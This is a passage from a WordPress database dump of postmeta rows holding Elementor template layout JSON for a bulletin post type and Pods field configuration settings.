settings=\\\"%7B%7D\\\"]\"}}],\"space_between\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":17,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"post-info\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(29408,4146,'_elementor_conditions','a:1:{i:0;s:30:\"include/singular/ekms_bulletin\";}'),(29410,4147,'_elementor_edit_mode','builder'),(29411,4147,'_elementor_template_type','single-post'),(29412,4147,'_elementor_version','3.4.0'),(29413,4147,'_elementor_pro_version','3.3.6'),(29414,4147,'_wp_page_template','default'),(29415,4147,'_elementor_page_settings','a:2:{s:12:\"preview_type\";s:20:\"single/ekms_bulletin\";s:10:\"preview_id\";s:4:\"3791\";}'),(29416,4147,'_elementor_data','[{\"id\":\"f09d1c7\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"7b0a14f\"}]},\"elements\":[{\"id\":\"5eb3e3a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5f7c8ef\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0435d20\"}]},\"elements\":[{\"id\":\"7941856\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0ba5ef7\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"title\":\"[elementor-tag id=\\\"\\\" name=\\\"post-title\\\" settings=\\\"%7B%22before%22%3A%22%22%2C%22after%22%3A%22%22%2C%22fallback%22%3A%22%22%7D\\\"]\"},\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"theme-post-title\"},{\"id\":\"3dc1769\",\"elType\":\"widget\",\"settings\":{\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":17,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"theme-post-content\"},{\"id\":\"c652bc2\",\"elType\":\"widget\",\"settings\":{\"view\":\"traditional\",\"icon_list\":[{\"selected_icon\":{\"value\":\"far fa-user-circle\",\"library\":\"fa-regular\"},\"_id\":\"2fbf64f\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"text_prefix\":\"Posted: \",\"link\":\"\",\"show_icon\":\"none\"},{\"type\":\"custom\",\"selected_icon\":{\"value\":\"fas fa-calendar\",\"library\":\"fa-solid\"},\"_id\":\"93c230f\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"link\":\"\",\"show_icon\":\"none\",\"__dynamic__\":{\"custom_text\":\"[elementor-tag id=\\\"0549fef\\\" name=\\\"pods-date\\\" settings=\\\"%7B%22key%22%3A%22ekms_bulletin%3A2483%3Aclosed_date%22%2C%22before%22%3A%22Closed%3A%20%22%7D\\\"]\"}},{\"type\":\"custom\",\"selected_icon\":{\"value\":\"far fa-clock\",\"library\":\"fa-regular\"},\"_id\":\"c661ccf\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"link\":\"\",\"show_icon\":\"none\",\"__dynamic__\":{\"custom_text\":\"[elementor-tag id=\\\"8259221\\\" name=\\\"pods-text\\\" settings=\\\"%7B%22key%22%3A%22ekms_bulletin%3A2483%3Aowner%22%2C%22before%22%3A%22Posted%20by%3A%20%22%7D\\\"]\"}},{\"type\":\"custom\",\"selected_icon\":{\"value\":\"far fa-comment-dots\",\"library\":\"fa-regular\"},\"_id\":\"f60d0d4\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"link\":\"\",\"show_icon\":\"none\",\"__dynamic__\":{\"custom_text\":\"[elementor-tag id=\\\"7798d79\\\" name=\\\"pods-text\\\" settings=\\\"%7B%7D\\\"]\"}}],\"space_between\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":17,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"post-info\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(38595,4096,'_elementor_css','a:6:{s:4:\"time\";i:1770855599;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:20:\"dynamic_elements_ids\";a:12:{i:0;s:7:\"05e59ec\";i:1;s:7:\"05e59ec\";i:2;s:7:\"9df80b7\";i:3;s:7:\"05e59ec\";i:4;s:7:\"05e59ec\";i:5;s:7:\"9df80b7\";i:6;s:7:\"05e59ec\";i:7;s:7:\"05e59ec\";i:8;s:7:\"9df80b7\";i:9;s:7:\"05e59ec\";i:10;s:7:\"05e59ec\";i:11;s:7:\"9df80b7\";}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(29418,4147,'_elementor_conditions','a:1:{i:0;s:30:\"include/singular/ekms_bulletin\";}'),(29422,4148,'_elementor_edit_mode','builder'),(29423,4148,'_elementor_template_type','single-post'),(29424,4148,'_elementor_version','3.4.0'),(29425,4148,'_elementor_pro_version','3.3.6'),(29426,4148,'_wp_page_template','default'),(29427,4148,'_elementor_page_settings','a:2:{s:12:\"preview_type\";s:20:\"single/ekms_bulletin\";s:10:\"preview_id\";s:4:\"3791\";}'),(29428,4148,'_elementor_data','[{\"id\":\"f09d1c7\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"7b0a14f\"}]},\"elements\":[{\"id\":\"5eb3e3a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5f7c8ef\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0435d20\"}]},\"elements\":[{\"id\":\"7941856\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0ba5ef7\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"title\":\"[elementor-tag id=\\\"\\\" name=\\\"post-title\\\" settings=\\\"%7B%22before%22%3A%22%22%2C%22after%22%3A%22%22%2C%22fallback%22%3A%22%22%7D\\\"]\"},\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"theme-post-title\"},{\"id\":\"3dc1769\",\"elType\":\"widget\",\"settings\":{\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":17,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"theme-post-content\"},{\"id\":\"c652bc2\",\"elType\":\"widget\",\"settings\":{\"view\":\"traditional\",\"icon_list\":[{\"selected_icon\":{\"value\":\"far fa-user-circle\",\"library\":\"fa-regular\"},\"_id\":\"2fbf64f\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"text_prefix\":\"Posted: \",\"link\":\"\",\"show_icon\":\"none\"},{\"type\":\"custom\",\"selected_icon\":{\"value\":\"fas fa-calendar\",\"library\":\"fa-solid\"},\"_id\":\"93c230f\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"link\":\"\",\"show_icon\":\"none\",\"__dynamic__\":{\"custom_text\":\"[elementor-tag id=\\\"0549fef\\\" name=\\\"pods-date\\\" settings=\\\"%7B%22key%22%3A%22ekms_bulletin%3A2483%3Aclosed_date%22%2C%22before%22%3A%22Closed%3A%20%22%7D\\\"]\"}},{\"type\":\"custom\",\"selected_icon\":{\"value\":\"far fa-clock\",\"library\":\"fa-regular\"},\"_id\":\"c661ccf\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"link\":\"\",\"show_icon\":\"none\",\"__dynamic__\":{\"custom_text\":\"[elementor-tag id=\\\"8259221\\\" name=\\\"pods-text\\\" settings=\\\"%7B%22key%22%3A%22ekms_bulletin%3A2483%3Aowner%22%2C%22before%22%3A%22Posted%20by%3A%20%22%7D\\\"]\"}},{\"_id\":\"40b47e1\",\"type\":\"custom\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"__dynamic__\":{\"custom_text\":\"[elementor-tag id=\\\"98090e3\\\" name=\\\"pods-text\\\" settings=\\\"%7B%7D\\\"]\"}}],\"space_between\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":17,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"post-info\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(29430,4148,'_elementor_conditions','a:1:{i:0;s:30:\"include/singular/ekms_bulletin\";}'),(29432,4149,'_elementor_edit_mode','builder'),(29433,4149,'_elementor_template_type','single-post'),(29434,4149,'_elementor_version','3.4.0'),(29435,4149,'_elementor_pro_version','3.3.6'),(29436,4149,'_wp_page_template','default'),(29437,4149,'_elementor_page_settings','a:2:{s:12:\"preview_type\";s:20:\"single/ekms_bulletin\";s:10:\"preview_id\";s:4:\"3791\";}'),(29438,4149,'_elementor_data','[{\"id\":\"f09d1c7\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"7b0a14f\"}]},\"elements\":[{\"id\":\"5eb3e3a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5f7c8ef\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0435d20\"}]},\"elements\":[{\"id\":\"7941856\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0ba5ef7\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"title\":\"[elementor-tag id=\\\"\\\" name=\\\"post-title\\\" settings=\\\"%7B%22before%22%3A%22%22%2C%22after%22%3A%22%22%2C%22fallback%22%3A%22%22%7D\\\"]\"},\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"theme-post-title\"},{\"id\":\"3dc1769\",\"elType\":\"widget\",\"settings\":{\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":17,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"theme-post-content\"},{\"id\":\"c652bc2\",\"elType\":\"widget\",\"settings\":{\"view\":\"traditional\",\"icon_list\":[{\"selected_icon\":{\"value\":\"far fa-user-circle\",\"library\":\"fa-regular\"},\"_id\":\"2fbf64f\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"text_prefix\":\"Posted: \",\"link\":\"\",\"show_icon\":\"none\"},{\"type\":\"custom\",\"selected_icon\":{\"value\":\"fas fa-calendar\",\"library\":\"fa-solid\"},\"_id\":\"93c230f\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"link\":\"\",\"show_icon\":\"none\",\"__dynamic__\":{\"custom_text\":\"[elementor-tag id=\\\"0549fef\\\" name=\\\"pods-date\\\" settings=\\\"%7B%22key%22%3A%22ekms_bulletin%3A2483%3Aclosed_date%22%2C%22before%22%3A%22Closed%3A%20%22%7D\\\"]\"}},{\"type\":\"custom\",\"selected_icon\":{\"value\":\"far fa-clock\",\"library\":\"fa-regular\"},\"_id\":\"c661ccf\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"link\":\"\",\"show_icon\":\"none\",\"__dynamic__\":{\"custom_text\":\"[elementor-tag id=\\\"8259221\\\" name=\\\"pods-text\\\" settings=\\\"%7B%22key%22%3A%22ekms_bulletin%3A2483%3Aowner%22%2C%22before%22%3A%22Posted%20by%3A%20%22%7D\\\"]\"}},{\"_id\":\"40b47e1\",\"type\":\"custom\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"__dynamic__\":{\"custom_text\":\"[elementor-tag id=\\\"98090e3\\\" name=\\\"pods-text\\\" settings=\\\"%7B%7D\\\"]\"},\"link\":\"\",\"show_icon\":\"none\"}],\"space_between\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":17,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"post-info\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(29440,4149,'_elementor_conditions','a:1:{i:0;s:30:\"include/singular/ekms_bulletin\";}'),(29614,4152,'_elementor_edit_mode','builder'),(29615,4152,'_elementor_template_type','single-post'),(29616,4152,'_elementor_version','3.4.0'),(29617,4152,'_elementor_pro_version','3.3.6'),(29618,4152,'_wp_page_template','default'),(29619,4152,'_elementor_page_settings','a:2:{s:12:\"preview_type\";s:20:\"single/ekms_bulletin\";s:10:\"preview_id\";s:4:\"3791\";}'),(29620,4152,'_elementor_data','[{\"id\":\"f09d1c7\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"7b0a14f\"}]},\"elements\":[{\"id\":\"5eb3e3a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5f7c8ef\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0435d20\"}]},\"elements\":[{\"id\":\"7941856\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0ba5ef7\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"title\":\"[elementor-tag id=\\\"\\\" name=\\\"post-title\\\" settings=\\\"%7B%22before%22%3A%22%22%2C%22after%22%3A%22%22%2C%22fallback%22%3A%22%22%7D\\\"]\"},\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"700\"},\"elements\":[],\"widgetType\":\"theme-post-title\"},{\"id\":\"3dc1769\",\"elType\":\"widget\",\"settings\":{\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"theme-post-content\"},{\"id\":\"c652bc2\",\"elType\":\"widget\",\"settings\":{\"view\":\"traditional\",\"icon_list\":[{\"selected_icon\":{\"value\":\"far fa-user-circle\",\"library\":\"fa-regular\"},\"_id\":\"2fbf64f\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"text_prefix\":\"Posted: \",\"link\":\"\",\"show_icon\":\"none\"},{\"type\":\"custom\",\"selected_icon\":{\"value\":\"fas fa-calendar\",\"library\":\"fa-solid\"},\"_id\":\"93c230f\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"link\":\"\",\"show_icon\":\"none\",\"__dynamic__\":{\"custom_text\":\"[elementor-tag id=\\\"0549fef\\\" name=\\\"pods-date\\\" settings=\\\"%7B%22key%22%3A%22ekms_bulletin%3A2483%3Aclosed_date%22%2C%22before%22%3A%22Closed%3A%20%22%7D\\\"]\"}},{\"type\":\"custom\",\"selected_icon\":{\"value\":\"far fa-clock\",\"library\":\"fa-regular\"},\"_id\":\"c661ccf\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"link\":\"\",\"show_icon\":\"none\",\"__dynamic__\":{\"custom_text\":\"[elementor-tag id=\\\"8259221\\\" name=\\\"pods-text\\\" settings=\\\"%7B%22key%22%3A%22ekms_bulletin%3A2483%3Aowner%22%2C%22before%22%3A%22Posted%20by%3A%20%22%7D\\\"]\"}},{\"_id\":\"40b47e1\",\"type\":\"custom\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"__dynamic__\":{\"custom_text\":\"[elementor-tag id=\\\"98090e3\\\" name=\\\"pods-text\\\" settings=\\\"%7B%7D\\\"]\"},\"link\":\"\",\"show_icon\":\"none\"}],\"space_between\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":17,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"post-info\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(29622,4152,'_elementor_conditions','a:1:{i:0;s:30:\"include/singular/ekms_bulletin\";}'),(29625,4153,'_elementor_edit_mode','builder'),(29626,4153,'_elementor_template_type','single-post'),(29627,4153,'_elementor_version','3.4.0'),(29628,4153,'_elementor_pro_version','3.3.6'),(29629,4153,'_wp_page_template','default'),(29630,4153,'_elementor_page_settings','a:2:{s:12:\"preview_type\";s:20:\"single/ekms_bulletin\";s:10:\"preview_id\";s:4:\"3791\";}'),(29631,4153,'_elementor_data','[{\"id\":\"f09d1c7\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"7b0a14f\"}]},\"elements\":[{\"id\":\"5eb3e3a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5f7c8ef\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0435d20\"}]},\"elements\":[{\"id\":\"7941856\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0ba5ef7\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"title\":\"[elementor-tag id=\\\"\\\" name=\\\"post-title\\\" settings=\\\"%7B%22before%22%3A%22%22%2C%22after%22%3A%22%22%2C%22fallback%22%3A%22%22%7D\\\"]\"},\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"typography_font_weight\":\"700\"},\"elements\":[],\"widgetType\":\"theme-post-title\"},{\"id\":\"3dc1769\",\"elType\":\"widget\",\"settings\":{\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"theme-post-content\"},{\"id\":\"c652bc2\",\"elType\":\"widget\",\"settings\":{\"view\":\"traditional\",\"icon_list\":[{\"selected_icon\":{\"value\":\"far fa-user-circle\",\"library\":\"fa-regular\"},\"_id\":\"2fbf64f\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"text_prefix\":\"Posted: \",\"link\":\"\",\"show_icon\":\"none\"},{\"type\":\"custom\",\"selected_icon\":{\"value\":\"fas fa-calendar\",\"library\":\"fa-solid\"},\"_id\":\"93c230f\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"link\":\"\",\"show_icon\":\"none\",\"__dynamic__\":{\"custom_text\":\"[elementor-tag id=\\\"0549fef\\\" name=\\\"pods-date\\\" settings=\\\"%7B%22key%22%3A%22ekms_bulletin%3A2483%3Aclosed_date%22%2C%22before%22%3A%22Closed%3A%20%22%7D\\\"]\"}},{\"type\":\"custom\",\"selected_icon\":{\"value\":\"far fa-clock\",\"library\":\"fa-regular\"},\"_id\":\"c661ccf\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"link\":\"\",\"show_icon\":\"none\",\"__dynamic__\":{\"custom_text\":\"[elementor-tag id=\\\"8259221\\\" name=\\\"pods-text\\\" settings=\\\"%7B%22key%22%3A%22ekms_bulletin%3A2483%3Aowner%22%2C%22before%22%3A%22Posted%20by%3A%20%22%7D\\\"]\"}},{\"_id\":\"40b47e1\",\"type\":\"custom\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"__dynamic__\":{\"custom_text\":\"[elementor-tag id=\\\"98090e3\\\" name=\\\"pods-text\\\" settings=\\\"%7B%7D\\\"]\"},\"link\":\"\",\"show_icon\":\"none\"}],\"space_between\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":17,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"post-info\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(29633,4153,'_elementor_conditions','a:1:{i:0;s:30:\"include/singular/ekms_bulletin\";}'),(29636,4154,'_elementor_edit_mode','builder'),(29637,4154,'_elementor_template_type','single-post'),(29638,4154,'_elementor_version','3.4.0'),(29639,4154,'_elementor_pro_version','3.3.6'),(29640,4154,'_wp_page_template','default'),(29641,4154,'_elementor_page_settings','a:2:{s:12:\"preview_type\";s:20:\"single/ekms_bulletin\";s:10:\"preview_id\";s:4:\"3791\";}'),(29642,4154,'_elementor_data','[{\"id\":\"f09d1c7\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"7b0a14f\"}]},\"elements\":[{\"id\":\"5eb3e3a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5f7c8ef\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0435d20\"}]},\"elements\":[{\"id\":\"7941856\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0ba5ef7\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"title\":\"[elementor-tag id=\\\"\\\" name=\\\"post-title\\\" settings=\\\"%7B%22before%22%3A%22%22%2C%22after%22%3A%22%22%2C%22fallback%22%3A%22%22%7D\\\"]\"},\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"typography_font_weight\":\"700\"},\"elements\":[],\"widgetType\":\"theme-post-title\"},{\"id\":\"3dc1769\",\"elType\":\"widget\",\"settings\":{\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"theme-post-content\"},{\"id\":\"c652bc2\",\"elType\":\"widget\",\"settings\":{\"view\":\"traditional\",\"icon_list\":[{\"selected_icon\":{\"value\":\"far fa-user-circle\",\"library\":\"fa-regular\"},\"_id\":\"2fbf64f\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"text_prefix\":\"Posted: \",\"link\":\"\",\"show_icon\":\"none\"},{\"type\":\"custom\",\"selected_icon\":{\"value\":\"fas fa-calendar\",\"library\":\"fa-solid\"},\"_id\":\"93c230f\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"link\":\"\",\"show_icon\":\"none\",\"__dynamic__\":{\"custom_text\":\"[elementor-tag id=\\\"0549fef\\\" name=\\\"pods-date\\\" settings=\\\"%7B%22key%22%3A%22ekms_bulletin%3A2483%3Aclosed_date%22%2C%22before%22%3A%22Closed%3A%20%22%7D\\\"]\"}},{\"type\":\"custom\",\"selected_icon\":{\"value\":\"far fa-clock\",\"library\":\"fa-regular\"},\"_id\":\"c661ccf\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"link\":\"\",\"show_icon\":\"none\",\"__dynamic__\":{\"custom_text\":\"[elementor-tag id=\\\"8259221\\\" name=\\\"pods-text\\\" settings=\\\"%7B%22key%22%3A%22ekms_bulletin%3A2483%3Aowner%22%2C%22before%22%3A%22Posted%20by%3A%20%22%7D\\\"]\"}},{\"_id\":\"40b47e1\",\"type\":\"custom\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"__dynamic__\":{\"custom_text\":\"[elementor-tag id=\\\"98090e3\\\" name=\\\"pods-text\\\" settings=\\\"%7B%7D\\\"]\"},\"link\":\"\",\"show_icon\":\"none\"}],\"space_between\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":17,\"sizes\":[]},\"text_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"post-info\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(38594,72,'_elementor_css','a:6:{s:4:\"time\";i:1770855599;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:20:\"dynamic_elements_ids\";a:2:{i:0;s:7:\"2301b1e\";i:1;s:7:\"2301b1e\";}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(29644,4154,'_elementor_conditions','a:1:{i:0;s:30:\"include/singular/ekms_bulletin\";}'),(29650,4155,'type','website'),(29651,4155,'required','0'),(29652,4155,'text_allow_shortcode','0'),(29653,4155,'text_allow_html','0'),(29654,4155,'text_allowed_html_tags','strong em a ul ol li b i'),(29655,4155,'text_max_length','255'),(29656,4155,'website_format','normal'),(29657,4155,'website_allow_port','0'),(29658,4155,'website_clickable','0'),(29659,4155,'website_new_window','0'),(29660,4155,'website_max_length','255'),(29661,4155,'website_html5','0'),(29662,4155,'phone_format','999-999-9999 x999'),(29663,4155,'phone_enable_phone_extension','1'),(29664,4155,'phone_max_length','25'),(29665,4155,'phone_html5','0'),(29666,4155,'email_max_length','255'),(29667,4155,'email_html5','0'),(29668,4155,'password_max_length','255'),(29669,4155,'paragraph_allow_html','1'),(29670,4155,'paragraph_oembed','0'),(29671,4155,'paragraph_wptexturize','1'),(29672,4155,'paragraph_convert_chars','1'),(29673,4155,'paragraph_wpautop','1'),(29674,4155,'paragraph_allow_shortcode','0'),(29675,4155,'paragraph_allowed_html_tags','strong em a ul ol li b i'),(29676,4155,'paragraph_max_length','0'),(29677,4155,'wysiwyg_editor','tinymce'),(29678,4155,'wysiwyg_media_buttons','1'),(29679,4155,'wysiwyg_oembed','0'),(29680,4155,'wysiwyg_wptexturize','1'),(29681,4155,'wysiwyg_convert_chars','1'),(29682,4155,'wysiwyg_wpautop','1'),(29683,4155,'wysiwyg_allow_shortcode','0'),(29684,4155,'code_allow_shortcode','0'),(29685,4155,'code_max_length','0'),(29686,4155,'datetime_type','wp'),(29687,4155,'datetime_format','mdy'),(29688,4155,'datetime_time_type','wp'),(29689,4155,'datetime_time_format','h_mm_A'),(29690,4155,'datetime_time_format_24','hh_mm'),(29691,4155,'datetime_allow_empty','1'),(29692,4155,'datetime_html5','0'),(29693,4155,'date_type','wp'),(29694,4155,'date_format','mdy'),(29695,4155,'date_allow_empty','1'),(29696,4155,'date_html5','0'),(29697,4155,'time_type','wp'),(29698,4155,'time_format','h_mm_A'),(29699,4155,'time_format_24','hh_mm'),(29700,4155,'time_allow_empty','1'),(29701,4155,'time_html5','0'),(29702,4155,'number_format_type','number'),(29703,4155,'number_format','i18n'),(29704,4155,'number_decimals','0'),(29705,4155,'number_format_soft','0'),(29706,4155,'number_step','1'),(29707,4155,'number_min','0'),(29708,4155,'number_max','100'),(29709,4155,'number_max_length','12'),(29710,4155,'currency_format_type','number'),(29711,4155,'currency_format_sign','aud'),(29712,4155,'currency_format_placement','before'),(29713,4155,'currency_format','i18n'),(29714,4155,'currency_decimals','2'),(29715,4155,'currency_decimal_handling','none'),(29716,4155,'currency_step','1'),(29717,4155,'currency_min','0'),(29718,4155,'currency_max','1000'),(29719,4155,'currency_max_length','12'),(29720,4155,'file_format_type','single'),(29721,4155,'file_uploader','attachment'),(29722,4155,'file_attachment_tab','upload'),(29723,4155,'file_upload_dir','wp'),(29724,4155,'file_edit_title','1'),(29725,4155,'file_show_edit_link','0'),(29726,4155,'file_linked','0'),(29727,4155,'file_limit','0'),(29728,4155,'file_restrict_filesize','10MB'),(29729,4155,'file_type','images'),(29730,4155,'file_field_template','rows'),(29731,4155,'file_add_button','Add File'),(29732,4155,'file_modal_title','Attach a file'),(29733,4155,'file_modal_add_button','Add 